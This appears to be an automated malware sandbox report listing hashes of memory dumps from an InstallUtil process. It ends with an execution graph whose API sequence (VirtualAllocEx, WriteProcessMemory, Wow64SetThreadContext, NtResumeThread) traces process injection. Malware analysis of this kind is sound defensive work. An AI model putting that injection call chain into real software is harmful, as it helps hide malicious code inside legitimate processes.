                                          • Instruction ID: 170d6b619794af2bd47f5f4c2b7ed6de37fe56ec555364a32a3732fdb69f164d
                                          • Opcode Fuzzy Hash: 67b41431a9342c280527796e06fb0aba8e6ed1b66edffcb23f3760e7bdea6bdf
                                          • Instruction Fuzzy Hash: B941CEB0D003499FDB14EFA9C484BDEBBF5FF48314F248429E819AB254DB759986CB90
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5c259cb7813337a371590fe984dfe6fc89375c021b43ef9db979ec5298360e03
                                          • Instruction ID: 9072c7025d138a49ba1956b0f99f6c309c2c9ec141bc35a4cbf59eece5a165e9
                                          • Opcode Fuzzy Hash: 5c259cb7813337a371590fe984dfe6fc89375c021b43ef9db979ec5298360e03
                                          • Instruction Fuzzy Hash: E6314D35E106099BCB19DF68D99469EB7B2FF88300F10852AE816E7391DB70AC46CB50
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 12c652557011617a04e8d6b77466d28c0fc55e3140f04e5639744153a823d228
                                          • Instruction ID: 1b229bc759dcb8f7b1ef13dc22097eeed41316fae30100ca389e5202eb859cb1
                                          • Opcode Fuzzy Hash: 12c652557011617a04e8d6b77466d28c0fc55e3140f04e5639744153a823d228
                                          • Instruction Fuzzy Hash: 8441CFB0D003499FDB10DFA9C484ADEBBB5FF48314F248429E819AB254DB759985CB90
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b2f22dd6c4762553a5ffe4c79f14d16ea25a812e5fe9b998c6fcd58ea568c90a
                                          • Instruction ID: 81a9f0a1d184b82c90cc58cff4a1964bb313325725924601e70d3cf4d1663156
                                          • Opcode Fuzzy Hash: b2f22dd6c4762553a5ffe4c79f14d16ea25a812e5fe9b998c6fcd58ea568c90a
                                          • Instruction Fuzzy Hash: 69311634600A14CBDB18FB68C955AAE77B6FB49305F1004A9D902EB3A4DF369C46DBA1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ce98e75e86dd81dff2a6c6fe7d9e1a784143c1c642fdde234bec5a2b559d1158
                                          • Instruction ID: 41007020adef0f837dddb621d92e3a5f21c0e874d14299dc6d0bc8b1539a0eee
                                          • Opcode Fuzzy Hash: ce98e75e86dd81dff2a6c6fe7d9e1a784143c1c642fdde234bec5a2b559d1158
                                          • Instruction Fuzzy Hash: 053128317082508FD715BB7CE4657DE3FA2FF86314F1844AAD045CB296EE24C84AD796
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 53ba2c58b653570576d92d09a67962e3f06a1f2af3149ec2e5498c46fc76395c
                                          • Instruction ID: 5ae80b2272a0021261d353c9cd2276bc42c315776cb25686b8799c73d8265018
                                          • Opcode Fuzzy Hash: 53ba2c58b653570576d92d09a67962e3f06a1f2af3149ec2e5498c46fc76395c
                                          • Instruction Fuzzy Hash: 8B214F34700214DFDB05EBB4D454B2E37A7FB89714F208469E4069B3A9CF769C56EB50
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8f84a1d563b9b4630c65959e7e2395dd2f05a1b51cfb4d2339740a954a72cfa5
                                          • Instruction ID: 082cbbfa90bbc9e0b45fbe4dabf98b22c63078de666e6a25f7f0941fc7027998
                                          • Opcode Fuzzy Hash: 8f84a1d563b9b4630c65959e7e2395dd2f05a1b51cfb4d2339740a954a72cfa5
                                          • Instruction Fuzzy Hash: D231A271E006099BDB15DFA4D9506AEF7B2FF89304F14851AE805EB395DB709C46CB50
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 054519f1ea4cd0d3ac92551cfced09e547abc997f179286d094087e962372ea3
                                          • Instruction ID: a249ef70999c6f3f78ca7f764de3b80dde6e0639caea1144933fedef4cd96245
                                          • Opcode Fuzzy Hash: 054519f1ea4cd0d3ac92551cfced09e547abc997f179286d094087e962372ea3
                                          • Instruction Fuzzy Hash: 46217130E106099BDB15DFA4D8906AEF7B2FF89300F149519E805EB391DB70AC86CB50
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67a4d5f0cdc3f1269589a0f77989e3dd389167e6938ad7320ea4520cd623267d
                                          • Instruction ID: e783b72ce975022d62dfe15beb79f02e618c7ed704e8d8c2ae2de4bef57add60
                                          • Opcode Fuzzy Hash: 67a4d5f0cdc3f1269589a0f77989e3dd389167e6938ad7320ea4520cd623267d
                                          • Instruction Fuzzy Hash: 89210B746046008FDF22FB68E898B593769FB56304F104965D041CB1B9EF34DC8BAB91
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 34a562428fcd363fa7e0941fded612db132666fbfaa29ae17e3ceea468264d34
                                          • Instruction ID: 93064ecec7133de51814d59e8000f584811595c2a57d9cef9dd1a96810b5bf69
                                          • Opcode Fuzzy Hash: 34a562428fcd363fa7e0941fded612db132666fbfaa29ae17e3ceea468264d34
                                          • Instruction Fuzzy Hash: D8210830A04245CFDF24EB78C92A6AA7BF9FF49305F2004A8D542EB261DF369C42DB51
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477128149.000000000082D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_82d000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 73764d907636ae134021ff7f35efb243a9a37ceebd2ffad64b68937f200085c5
                                          • Instruction ID: 6a1510ea442847c8f4270be73ee8c034c86c683550afb63adbe00ec8f00b247c
                                          • Opcode Fuzzy Hash: 73764d907636ae134021ff7f35efb243a9a37ceebd2ffad64b68937f200085c5
                                          • Instruction Fuzzy Hash: E7210AB1504344EFDB05EF50E9C0B26BF65FB94314F24C569D9094F256C336E896CBA1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d5b6130116bcfe913089f660eb61bd8fa2d1c1862e137c9973560cb20edddb1c
                                          • Instruction ID: 45f2437b161358c7d45b6e0bac5967e81713ad0b22d8be3c841b448881dbeeb8
                                          • Opcode Fuzzy Hash: d5b6130116bcfe913089f660eb61bd8fa2d1c1862e137c9973560cb20edddb1c
                                          • Instruction Fuzzy Hash: 3D21A134E00609DBCB15DFA8D490AEEBBB2FF89300F14862AE865F7241DB709C42CB50
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 755fb57c2f38f78a8d5865e2a08388345b90a9a5baacbeae450c111b70666a52
                                          • Instruction ID: e3d6e27450d9854c7ec87f908ce64823bd38a6e49398317b9528d46025039024
                                          • Opcode Fuzzy Hash: 755fb57c2f38f78a8d5865e2a08388345b90a9a5baacbeae450c111b70666a52
                                          • Instruction Fuzzy Hash: F121ACB4A002108BEF323728E45C3697BA9FB56315F100C69E406CB7A1DE2D9D8B9B46
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477235125.000000000083D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_83d000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 35372c0d29c192320ef10cee6450731ee1d14fa4c09ee8e394eed6d0db1a9e28
                                          • Instruction ID: 9f0cd840f84dc9b5c5db1ac1b97952a1657255cf17e6a502038553af50fd6bd9
                                          • Opcode Fuzzy Hash: 35372c0d29c192320ef10cee6450731ee1d14fa4c09ee8e394eed6d0db1a9e28
                                          • Instruction Fuzzy Hash: E4212571504704DFDB18DF10E4D0B16BB65FBC4714F20C56DD8498B252C33AD847CAA1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aee848756d27c4a2d23ceefeb36dbf13b38082f161997436286d5854a6214a5e
                                          • Instruction ID: 659197d4cb5a9e2beda2589492dd728d34066754d098d0cd2ac67da0fc18d3d5
                                          • Opcode Fuzzy Hash: aee848756d27c4a2d23ceefeb36dbf13b38082f161997436286d5854a6214a5e
                                          • Instruction Fuzzy Hash: 72219671B102149FEB14EB69C854BBE77FAFF88714F184165E505EB3A4DA71DD008B90
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6215bb9439ade945935ca6fd0f61f906d23e50bd8d8da4dadcd91fea966181ec
                                          • Instruction ID: 2f83bfaefb4c185ae738a7a620cb125ec0e746902a2e67b30d7511c4f116b719
                                          • Opcode Fuzzy Hash: 6215bb9439ade945935ca6fd0f61f906d23e50bd8d8da4dadcd91fea966181ec
                                          • Instruction Fuzzy Hash: 9B214F34E00609DBCB19DFA8C4549AEB7B2FF89310F14861AE825F7390DB70AC45CB50
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 11551d366b6dfbcbaa49deceddbc3047990895650c17f355c13287f68ffef737
                                          • Instruction ID: e8ce1514aafb2b63f1ee5b04283359e486cae28f77cc9fa5ce8518804bd24d7b
                                          • Opcode Fuzzy Hash: 11551d366b6dfbcbaa49deceddbc3047990895650c17f355c13287f68ffef737
                                          • Instruction Fuzzy Hash: 7D21E734B00249CBDF54EB68C9296AE77FAFB49705F200468D106EB2A4DF359D42DBA1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7be9b05df735a19be50a946c2919b409eb83d55097c0907b8407ac45e1826e20
                                          • Instruction ID: 7d928c72a275eff740996fda401f626bfcd4cc5d6c3e3425850289ca9a039d23
                                          • Opcode Fuzzy Hash: 7be9b05df735a19be50a946c2919b409eb83d55097c0907b8407ac45e1826e20
                                          • Instruction Fuzzy Hash: 0F2136786006008BEF22FB68E898F5D775DF759315F104925D006CB279EE34DC9AAB91
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e4327e598b24c9efa7b960f678f1a4f99bd65d907a84d69b26c8817db0596127
                                          • Instruction ID: 7bfc8584e901cf7e58ca4506f09a364880ae35aaf0833ef6bfbc7575805e7cf4
                                          • Opcode Fuzzy Hash: e4327e598b24c9efa7b960f678f1a4f99bd65d907a84d69b26c8817db0596127
                                          • Instruction Fuzzy Hash: A2118C30B012088BEFA4BAB9DC547293755FB96314F208979D446CF351DA25CCCA9FC2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b1bb89dc9199d1b9abf730690eb699303da828a89323115f919c943df80b61be
                                          • Instruction ID: 3bac3b25121fb11fccf7b29def514f3d5ac21011085b22f08637aa035f27658c
                                          • Opcode Fuzzy Hash: b1bb89dc9199d1b9abf730690eb699303da828a89323115f919c943df80b61be
                                          • Instruction Fuzzy Hash: 45119130B053088BEFA176A9DC543693764FB56314F24497AD446CF252DA25CCCA9FC2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477128149.000000000082D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_82d000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                          • Instruction ID: 5081d3abaf1045540264ba9df635dec2935eb27a63a4eb19f5bfa5dc95dec2dc
                                          • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                          • Instruction Fuzzy Hash: 9311AF76504240DFCB05DF10D5C4B56BF62FB94324F24C6A9D8494B656C33AE89ACBA1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f4e06a82cc595b77f320809bf01733407423dac515468d12a026e9fadf858742
                                          • Instruction ID: 5caeced5dfe024e322298e3c7dfd9b784ba4e1a013ba4ac27d5541396fc46793
                                          • Opcode Fuzzy Hash: f4e06a82cc595b77f320809bf01733407423dac515468d12a026e9fadf858742
                                          • Instruction Fuzzy Hash: 77113C31A002558BCF61EFBC84551EE7BF9FF48324B2404B9D845E7642DA35CC42CB95
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 40fb7e3eabe2eed614d6a5958275e8e28dbca1cbe0f1f8c70e8a6e58efbb81fc
                                          • Instruction ID: d42e7ae24df44dd2df9f38f55926725bddd80e0cfffc09824ddc66d5922f270d
                                          • Opcode Fuzzy Hash: 40fb7e3eabe2eed614d6a5958275e8e28dbca1cbe0f1f8c70e8a6e58efbb81fc
                                          • Instruction Fuzzy Hash: B8016D31A002198BCF61FFB884451AE7BF9FF48324B24047AD405E7702EB35CC428B99
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477235125.000000000083D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_83d000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                          • Instruction ID: e6f5c815dff4600785e18df1c2944982058a9ee0b2ee482914ee57c181995a86
                                          • Opcode Fuzzy Hash: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                          • Instruction Fuzzy Hash: 4111BB75504780CFCB15CF10E5D4B15BBA2FB84714F24C6AAD8498B656C33AD84ACBA2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e09c0e8a65a88ed1e19f80b286ce7727e61d7b4b02cd03b4b9a4ac0ace8ec67f
                                          • Instruction ID: eb832a5c45660b35a9ac663344bf577a38cdd9dcdcea1002ec66cf44e7580c03
                                          • Opcode Fuzzy Hash: e09c0e8a65a88ed1e19f80b286ce7727e61d7b4b02cd03b4b9a4ac0ace8ec67f
                                          • Instruction Fuzzy Hash: 5901D870A00204CBDB14EFA5ED9479ABBA6FF80311F54C164D80C5F29ADB74ED55CBA1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0b0bdcdf8caeddc1def8f7e8f60e815bc0699d1688a0326ac59cc27b4ab2bd5e
                                          • Instruction ID: 7e37b43c513ed20c7a4326ec01511f662044cb7e9569fcf131d9345a0bfc9409
                                          • Opcode Fuzzy Hash: 0b0bdcdf8caeddc1def8f7e8f60e815bc0699d1688a0326ac59cc27b4ab2bd5e
                                          • Instruction Fuzzy Hash: 0A01A2705046898FCB06EBA8F9A199C7B71EF42344B54469CC4405F1A7DF306E9AF7A2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2c5fe791762c4a15383e32bfa1d23ea458eba0de295001d18b0809582c75436f
                                          • Instruction ID: f5865ac4cdd0009611ef1ff8336907289464f96dde818c7ef5e84fb81ebed0c1
                                          • Opcode Fuzzy Hash: 2c5fe791762c4a15383e32bfa1d23ea458eba0de295001d18b0809582c75436f
                                          • Instruction Fuzzy Hash: F3F0A470A00208DFCB05FBE8FD91A8C77B5EF44304F908568C4049B256DF306E99ABA1

                                          Execution Graph

                                          Execution Coverage:12.7%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:249
                                          Total number of Limit Nodes:11
                                          execution_graph 57877 579d5e8 57878 579d637 NtProtectVirtualMemory 57877->57878 57880 579d6af 57878->57880 57906 57aba19 57907 57aba23 57906->57907 57911 5794dc8 57907->57911 57916 5794db8 57907->57916 57908 57aba61 57912 5794ddd 57911->57912 57921 5794e9b 57912->57921 57926 5794f95 57912->57926 57913 5794df3 57913->57908 57917 5794ddd 57916->57917 57919 5794e9b 2 API calls 57917->57919 57920 5794f95 2 API calls 57917->57920 57918 5794df3 57918->57908 57919->57918 57920->57918 57923 5794ec2 57921->57923 57922 57951fa 57922->57913 57923->57922 57924 579ed68 VirtualProtect 57923->57924 57925 579ed61 VirtualProtect 57923->57925 57924->57923 57925->57923 57928 5794f9b 57926->57928 57927 57951fa 57927->57913 57928->57927 57929 579ed68 VirtualProtect 57928->57929 57930 579ed61 VirtualProtect 57928->57930 57929->57928 57930->57928 57931 57ab40f 57932 57ab419 57931->57932 57936 5a78940 57932->57936 57944 5a78950 57932->57944 57933 57aafa9 57937 5a78965 57936->57937 57952 5a79025 57937->57952 57955 5a78d98 57937->57955 57958 5a791bb 57937->57958 57961 5a78cdf 57937->57961 57964 5a79142 57937->57964 57945 5a78965 57944->57945 57947 5a79025 10 API calls 57945->57947 57948 5a79142 10 API calls 57945->57948 57949 5a78cdf 10 API calls 57945->57949 57950 5a791bb 10 API calls 57945->57950 57951 5a78d98 10 API calls 57945->57951 57946 5a7897b 57946->57933 57947->57946 57948->57946 57949->57946 57950->57946 57951->57946 57953 5a78df5 57952->57953 57967 5a7a0e0 57953->57967 57956 5a78dc2 57955->57956 57957 5a7a0e0 10 API calls 57956->57957 57957->57956 57959 5a78df5 57958->57959 57960 5a7a0e0 10 API calls 57959->57960 57960->57959 57962 5a78ce4 57961->57962 57963 5a7a0e0 10 API calls 57962->57963 57963->57962 57965 5a78df5 57964->57965 57966 5a7a0e0 10 API calls 57965->57966 57966->57965 57968 5a7a105 57967->57968 57969 5a7a127 57968->57969 57971 5a7a3c4 57968->57971 57969->57953 57972 5a7a3dc 57971->57972 57976 5a7a8f2 57972->57976 57989 5a7a900 57972->57989 57973 5a7a1ab 57977 5a7a900 57976->57977 58002 5a7af1f 57977->58002 58007 5a7b61f 57977->58007 58012 5a7af72 57977->58012 58017 5a7b443 57977->58017 58022 5a7aec4 57977->58022 58028 5a7b1e4 57977->58028 58035 5a7b0cb 57977->58035 58040 5a7b19c 57977->58040 58045 5a7b6be 57977->58045 58050 5a7b71e 57977->58050 57978 5a7a937 57978->57973 57990 5a7a915 57989->57990 57992 5a7b1e4 2 API calls 57990->57992 57993 5a7aec4 2 API calls 57990->57993 57994 5a7b443 2 API calls 57990->57994 57995 5a7af72 2 API calls 57990->57995 57996 5a7b61f 2 API calls 57990->57996 57997 5a7af1f 2 API calls 57990->57997 57998 5a7b71e 2 API calls 57990->57998 57999 5a7b6be 2 API calls 57990->57999 58000 5a7b19c 2 API calls 57990->58000 58001 5a7b0cb 2 API calls 57990->58001 57991 5a7a937 57991->57973 57992->57991 57993->57991 57994->57991 57995->57991 57996->57991 57997->57991 57998->57991 57999->57991 58000->57991 58001->57991 58003 5a7af25 58002->58003 58004 5a7a9c8 58003->58004 58055 5a7d4c1 58003->58055 58060 5a7d4d0 58003->58060 58004->57978 58008 5a7b626 58007->58008 58073 5a7bed9 58008->58073 58077 5a7bee8 58008->58077 58009 5a7b653 58013 5a7af8f 58012->58013 58093 579e871 58013->58093 58097 579e878 58013->58097 58014 5a7a9c8 58014->57978 58018 5a7b45f 58017->58018 58020 579e878 WriteProcessMemory 58018->58020 58021 579e871 WriteProcessMemory 58018->58021 58019 5a7a9c8 58019->57978 58020->58019 58021->58019 58023 5a7b4f1 58022->58023 58025 5a7a9c8 58022->58025 58101 5a7d429 58023->58101 58106 5a7d438 58023->58106 58024 5a7b50a 58025->57978 58029 5a7b1ee 58028->58029 58030 5a7b19c 58028->58030 58119 5a7d5b1 58030->58119 58125 5a7d608 58030->58125 58130 5a7d5f8 58030->58130 58031 5a7b1b4 58036 5a7b0e8 58035->58036 58038 579e878 WriteProcessMemory 58036->58038 58039 579e871 WriteProcessMemory 58036->58039 58037 5a7a9c8 58037->57978 58038->58037 58039->58037 58042 5a7d5b1 2 API calls 58040->58042 58043 5a7d5f8 2 API calls 58040->58043 58044 5a7d608 2 API calls 58040->58044 58041 5a7b1b4 58042->58041 58043->58041 58044->58041 58046 5a7b6c8 58045->58046 58047 5a7a9c8 58046->58047 58135 579ea88 58046->58135 58139 579ea90 58046->58139 58047->57978 58051 5a7b6e4 58050->58051 58052 5a7a9c8 58050->58052 58051->58050 58053 579ea88 NtResumeThread 58051->58053 58054 579ea90 NtResumeThread 58051->58054 58052->57978 58053->58051 58054->58051 58056 5a7d4d0 58055->58056 58065 579e718 58056->58065 58069 579e710 58056->58069 58057 5a7d507 58057->58004 58061 5a7d4e5 58060->58061 58063 579e718 VirtualAllocEx 58061->58063 58064 579e710 VirtualAllocEx 58061->58064 58062 5a7d507 58062->58004 58063->58062 58064->58062 58066 579e75c VirtualAllocEx 58065->58066 58068 579e7d4 58066->58068 58068->58057 58070 579e718 VirtualAllocEx 58069->58070 58072 579e7d4 58070->58072 58072->58057 58074 5a7bee8 58073->58074 58075 5a7bf21 58074->58075 58081 5a7c716 58074->58081 58075->58009 58078 5a7beff 58077->58078 58079 5a7bf21 58078->58079 58080 5a7c716 2 API calls 58078->58080 58079->58009 58080->58079 58085 579de00 58081->58085 58089 579ddf5 58081->58089 58086 579de80 CreateProcessA 58085->58086 58088 579e07c 58086->58088 58090 579de00 CreateProcessA 58089->58090 58092 579e07c 58090->58092 58094 579e8c4 WriteProcessMemory 58093->58094 58096 579e95d 58094->58096 58096->58014 58098 579e8c4 WriteProcessMemory 58097->58098 58100 579e95d 58098->58100 58100->58014 58102 5a7d438 58101->58102 58111 579e1b8 58102->58111 58115 579e1b0 58102->58115 58103 5a7d466 58103->58024 58107 5a7d44d 58106->58107 58109 579e1b8 Wow64SetThreadContext 58107->58109 58110 579e1b0 Wow64SetThreadContext 58107->58110 58108 5a7d466 58108->58024 58109->58108 58110->58108 58112 579e201 Wow64SetThreadContext 58111->58112 58114 579e279 58112->58114 58114->58103 58116 579e1b8 Wow64SetThreadContext 58115->58116 58118 579e279 58116->58118 58118->58103 58120 5a7d5b5 58119->58120 58121 5a7d5ba 58120->58121 58123 579e1b8 Wow64SetThreadContext 58120->58123 58124 579e1b0 Wow64SetThreadContext 58120->58124 58121->58031 58122 5a7d636 58122->58031 58123->58122 58124->58122 58126 5a7d61d 58125->58126 58128 579e1b8 Wow64SetThreadContext 58126->58128 58129 579e1b0 Wow64SetThreadContext 58126->58129 58127 5a7d636 58127->58031 58128->58127 58129->58127 58131 5a7d608 58130->58131 58133 579e1b8 Wow64SetThreadContext 58131->58133 58134 579e1b0 Wow64SetThreadContext 58131->58134 58132 5a7d636 58132->58031 58133->58132 58134->58132 58136 579ea90 NtResumeThread 58135->58136 58138 579eb30 58136->58138 58138->58046 58140 579ead9 NtResumeThread 58139->58140 58142 579eb30 58140->58142 58142->58046 57881 57ab1ec 57882 57ab1f6 57881->57882 57886 5a71100 57882->57886 57891 5a710f0 57882->57891 57883 57ab234 57887 5a71115 57886->57887 57896 5a71130 57887->57896 57901 5a71140 57887->57901 57888 5a7112b 57888->57883 57892 5a71100 57891->57892 57894 5a71130 2 API calls 57892->57894 57895 5a71140 2 API calls 57892->57895 57893 5a7112b 57893->57883 57894->57893 57895->57893 57897 5a71140 57896->57897 57898 5a711ce 57897->57898 57899 579ed61 VirtualProtect 57897->57899 57900 579ed68 VirtualProtect 57897->57900 57898->57888 57899->57897 57900->57897 57902 5a7116d 57901->57902 57903 5a711ce 57902->57903 57904 579ed68 VirtualProtect 57902->57904 57905 579ed61 VirtualProtect 57902->57905 57903->57888 57904->57902 57905->57902 58143 af1b18 58144 af1b35 58143->58144 58145 af1b45 58144->58145 58150 af63bf 58144->58150 58155 af4fc7 58144->58155 58159 af4f59 58144->58159 58163 af507e 58144->58163 58167 57314ca 58150->58167 58175 5731488 58150->58175 58179 5731478 58150->58179 58151 af63e3 58156 af4fce 58155->58156 58157 af4f59 58155->58157 58157->58155 58191 affe88 58157->58191 58160 af4f78 58159->58160 58160->58159 58161 af4fce 58160->58161 58162 affe88 2 API calls 58160->58162 58162->58160 58164 af509d 58163->58164 58166 affe88 